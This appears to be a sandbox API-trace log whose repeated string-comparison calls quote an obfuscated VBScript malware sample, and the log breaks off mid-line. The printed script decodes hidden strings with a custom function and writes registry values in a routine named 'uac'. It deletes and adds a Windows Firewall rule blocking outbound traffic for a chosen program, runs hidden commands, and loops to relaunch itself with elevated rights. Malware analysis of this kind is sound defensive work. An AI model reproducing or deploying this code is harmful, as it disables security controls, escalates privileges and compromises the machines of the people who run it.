bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0226.311] wcsncmp (_String1="\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.311] wcsncmp (_String1="\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0226.311] wcsncmp (_String1="\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0226.311] wcsncmp (_String1="s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 